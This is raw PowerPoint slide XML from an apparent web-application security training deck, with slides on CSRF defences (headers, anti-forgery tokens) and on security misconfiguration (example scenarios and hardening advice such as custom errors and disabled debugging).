          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2236424" y="2109250"/>
            <a:ext cx="8530785" cy="4215661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1707251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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="10004662"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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF – Cross site request forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1594480"/>
            <a:ext cx="10876793" cy="2708434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CSRF Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>X-Frame-Options set to SAMEORIGIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan your headers at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> https://securityheaders.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See how to add the header: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://scotthelme.co.uk/hardening-your-http-response-headers/#x-frame-options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1875E9FE-9E0A-4E4F-A40B-F8CA1F9354D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6223142" y="3429000"/>
            <a:ext cx="4914335" cy="3227687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="IIS Response Headers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7BAA4F7-3BAE-483B-B74A-CC6DC0A68B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7818" y="3429000"/>
            <a:ext cx="4365110" cy="322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29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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="10004662"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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF – Cross site request forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1594480"/>
            <a:ext cx="10876793" cy="4370427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUMMARY:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CSRF is made possible when a legitimate request is reconstructed into one with malicious intent </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The authenticated state of the victim is abused and the browser tricked into issuing the request </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The only real mitigation is anti-forgery tokens </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy in MVC, messier in web forms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Because the request is issued by the victim’s browser, it appears legitimate thus difficult to implement other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>defences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> around </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Like with XSS, browsers offer some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>defences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also like XSS, don’t rely on them! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3009587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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="7744428"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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="918043" y="3336983"/>
            <a:ext cx="10876793" cy="3447098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Example Attack Scenarios </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Directory listing is not disabled on your server. Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she decompiles and reverse engineers to get all your custom code. She then finds a serious access control flaw in your application. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>App server comes with sample applications that are not removed from your production server. Said sample applications have well known security flaws attackers can use to compromise your server. </a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4834C78-0972-4059-836C-B8878ED300D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="918043" y="852444"/>
            <a:ext cx="6176820" cy="2339200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40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91713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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="7744428"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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1540363"/>
            <a:ext cx="10876793" cy="4708981"/>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ZA" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> files are configured to not show internal errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Set the custom error mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>If you need these on for DEV then ensure you have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> that removed it for UAT and up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>disable debugging outside of your DEV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Never disable request validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypt sensitive configuration data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{848BA62F-6C3F-44FB-9E42-59F2AD7C8FEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213854" y="2102558"/>
            <a:ext cx="7419986" cy="761827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D3C6B6-8705-4B00-BEDF-9A7F7221AB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213854" y="3332601"/>
            <a:ext cx="3143250" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A77F3D6B-913E-4991-9D14-3D52564B835F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213854" y="4392964"/>
            <a:ext cx="4219575" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
